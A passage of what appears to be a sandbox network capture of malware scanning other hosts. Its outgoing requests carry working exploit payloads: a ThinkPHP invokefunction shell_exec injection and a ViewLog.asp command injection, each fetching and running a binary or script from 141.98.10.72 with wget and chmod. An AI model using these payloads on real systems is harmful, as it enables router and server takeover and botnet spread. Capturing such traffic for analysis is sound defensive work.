invalid.<p>Reference #9.2f0b1502.1707899466.20f9298f</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
990	192.168.2.15	33254	95.42.211.55	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.727202892 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:06.955039978 CET	275	IN	HTTP/1.1 505 HTTP Version not supported Content-Type: text/html; charset=utf-8 Content-Length: 140 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
991	192.168.2.15	43078	95.237.209.81	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.734740019 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:06.969922066 CET	511	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:31:06 GMT Server: Apache/2.4.57 (Debian) Content-Length: 317 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 63 2d 32 32 2e 73 6d 64 61 74 61 2d 6c 61 62 2e 64 64 6e 73 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.57 (Debian) Server at pc-22.smdata-lab.ddns.net Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
992	192.168.2.15	44890	31.148.246.3	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:07.268676043 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:07.504666090 CET	94	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:31:07 GMT Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port
993	192.168.2.15	44944	31.148.246.3	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:07.503560066 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:07.732033968 CET	94	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:31:07 GMT Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port
994	192.168.2.15	48886	95.210.96.138	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:07.696815014 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
995	192.168.2.15	38564	95.165.172.20	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:07.731843948 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:07.964174986 CET	438	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 11:31:06 GMT Server: Webs X-Frame-Options: SAMEORIGIN Cache-Control: no-cache Content-Length: 193 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /cgi-bin/ViewLog.asp</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
996	192.168.2.15	40160	31.128.222.108	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:07.946805954 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:08.197068930 CET	469	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'none' Strict-Transport-Security: max-age=3600 Content-Length: 130 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
997	192.168.2.15	33132	31.168.190.150	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:07.949218988 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:08.206794024 CET	659	IN	HTTP/1.0 404 Not Found !!! Pragma: no-cache Content-type: text/html <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html> Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
998	192.168.2.15	59996	112.158.120.208	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:09.292148113 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
999	192.168.2.15	36532	95.141.251.249	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:09.838797092 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:10.077884912 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:31:09 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1000	192.168.2.15	53516	31.136.72.109	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:10.465004921 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:13.559209108 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:19.703156948 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:31.734875917 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:57.078003883 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1001	192.168.2.15	42514	94.23.166.118	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:10.483541012 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:10.703769922 CET	304	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:31:10 GMT Server: Apache Content-Length: 126 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1002	192.168.2.15	36294	94.122.87.147	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:10.510863066 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1003	192.168.2.15	52696	95.164.169.162	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:10.583962917 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:10.774641037 CET	1260	IN	HTTP/1.1 400 Bad Request Server: squid/4.10 Mime-Version: 1.0 Date: Wed, 14 Feb 2024 08:31:10 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3543 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from localhost X-Cache-Lookup: NONE from localhost:8080 Via: 1.1 localhost (squid/4.10) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans

Session ID	Source IP	Source Port	Destination IP	Destination Port
1004	192.168.2.15	58864	85.66.169.175	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:10.687622070 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
